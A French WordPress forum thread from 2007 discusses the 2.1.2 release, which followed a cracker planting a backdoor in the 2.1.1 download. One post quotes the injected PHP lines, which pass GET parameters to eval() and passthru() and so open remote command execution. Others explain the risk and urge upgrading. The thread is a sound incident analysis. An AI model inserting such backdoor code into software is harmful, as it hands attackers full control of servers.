Sortie de WP 2.1.2 (Créer un compte)

  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 16)
  • Auteur
    Messages
  • #450914
    LH
    Membre
    Chevalier WordPress
    372 contributions

    Bonjour,

    J’ai vu que la version 2.1.2 est sortie.
    Qui sait ce qu’elle corrige / apporte ?

    Bon week-end.

    #594488
    chsxf
    Participant
    Chevalier WordPress
    129 contributions

    Le fichier est effectivement disponible mais le changelog ne l’est pas encore.

    Surveille cette page pour des infos précises sur l’évolution des versions : http://codex.wordpress.org/WordPress_Versions

    L’explication de la 2.1.2 se trouve ici en revanche :
    http://wordpress.org/development/2007/03/upgrade-212/

    #594489
    AmO
    Participant
    Maître WordPress
    4451 contributions

    Aucune modif logiquement.

    J’en connais un qui va etre content 🙂

    Il va refaire les packs :D

    #594490
    spoutnik
    Membre
    Initié WordPress
    23 contributions

    Bonsoir à tous.

    La version 2.1.2. est sortie suite à une énorme faille de sécurité !!!!!!
    Je viens de lire ceci (extrait) dans mon panneau d’administration de WP.:

    Long story short: If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker, and you should upgrade all of your files to 2.1.2 immediately.

    Voici le lien de l’article: upgrade to 2.1.2.

    #594491
    AmO
    Participant
    Maître WordPress
    4451 contributions

    spoutnik > on doit pas speak le même anglais.

    Il n’est pas question d’une faille de sécurité.
    Un hacker a réussi à inclure un script malveillant dans la version US du script.

    Ce qui est différent.

    De 1, on ne sait pas si le .fr est concerné ou pas.
    De 2, ça n’est pas le premier projet Open Source à avoir ce genre de probleme.

    Cela dit… mettais à jour vos blogs !!

    #594492
    spoutnik
    Membre
    Initié WordPress
    23 contributions
    AmO wrote:
    spoutnik > on doit pas speak le même anglais.

    Normal je comprends pas l’anglais 😋 désolé pour la mauvaise traduction 😇

    #594493
    AmO
    Participant
    Maître WordPress
    4451 contributions

    🍺

    #594494
    benkenobi
    Gestionnaire du forum
    Maître WordPress
    4079 contributions
    #594495
    prometee
    Membre
    Initié WordPress
    3 contributions

    J’ai fait une petite comparaison de fichiers entre la version 2.1.1 et 2.1.2, et apparemment ce serait les fichiers feed.php et theme.php qui aurais était modifié par le cracker… je vais regarder ça de plus prêt…

    Le crackeur a modifié ces lignes :
    * wp-includes/feed.php :

    rajout de 3 lignes 84 à 86 :

    function comment_text_phpfilter($filterdata) {
    	eval($filterdata);
    }

    et rajout ligne 149 :

    if ($_GET[“ix”]) { comment_text_phpfilter($_GET[“ix”]); }

    * wp-includes/theme.php

    rajout de 3 ligne 408 à 410 :

    function get_theme_mcommand($mcds) {
    	passthru($mcds);
    }

    et ligne 441 :

    if ($_GET[“iz”]) { get_theme_mcommand($_GET[“iz”]); }

    #594496
    benkenobi
    Gestionnaire du forum
    Maître WordPress
    4079 contributions

    Et quelles sont les conséquences potentielles de telles modifications ?

    #594497
    alakhnor
    Participant
    Maître WordPress
    996 contributions

    D’après ce que je peux en comprendre, il utilise le feed du blog pour prendre la main et lancer des commandes, des programmes, etc… tout en ayant les mêmes autorisations que le blog (toutes donc).

    #594498
    AmO
    Participant
    Maître WordPress
    4451 contributions

    Le pack 2.1.1 français est donc, après vérification, également compromis. raison de plus pour migrer vers le pack fr 2.1.2 😉

    Edit : j’ai supprimé le pack français 2.1.1 … on est jamais trop sur 😉

    #594499
    mj23
    Membre
    Initié WordPress
    41 contributions

    je viens tout juste de decouvrir WP et créer mon blog en 2.1.1

    j’ai changé de thème j’ai optimisé plein de trucs et voila qu’il faut deja faire une MAJ grrrr !!!!!!

    j’ai lu le tuto pour upgrader c’est super chiant ca donne pas envie……….:( on est sûr de retrouver le meme blog qu’avant la MAJ ? qui l’a deja fait ?

    si c’est juste qqs lignes de codes en plus, si on les supprime c’est pas bon ? à priori ya que 2 fichiers de touchés….

    #594500
    damino
    Participant
    Maître WordPress
    1243 contributions
    mj23 wrote:
    je viens tout juste de decouvrir WP et créer mon blog en 2.1.1

    j’ai changé de thème j’ai optimisé plein de trucs et voila qu’il faut deja faire une MAJ grrrr !!!!!!

    j’ai lu le tuto pour upgrader c’est super chiant ca donne pas envie……….:( on est sûr de retrouver le meme blog qu’avant la MAJ ? qui l’a deja fait ?

    si c’est juste qqs lignes de codes en plus, si on les supprime c’est pas bon ? à priori ya que 2 fichiers de touchés….

    Salut.
    C’est assez rapide de faire des mises à jour. Rien de comparable par exemple avec une mise à jour de phpBB vraiment chiante !

    Les mises à jour ne concernent pas ton thème donc aucun problème pour retrouver ton blog tel que customisé.
    Pour être précis certaines mises à jour “majeures” peuvent nécessiter de légèrement modifier son thème (le code) mais ce n’est pas le cas ici.
    Pareil pour tes plugins.
    De toute façon une mise à jour n’est rien de plus que de virer certains fichiers du serveurs et les remplacer par d’autres. Et tu n’as pas à modifier le code de certains fichiers sauf évidement si tu as fais des modifications directement dans le code des fichiers “core” de WordPress (ce qui n’est pas conseillé et bien souvent inutile).

    #594501
    mj23
    Membre
    Initié WordPress
    41 contributions

    slt man merci pour ta réponse
    en fait entre temps j’ai echangé avec fran6 et il m’a bien expliqué la chose

    je tente peut être ce week end 😉

15 sujets de 1 à 15 (sur un total de 16)
  • Vous devez être connecté pour répondre à ce sujet.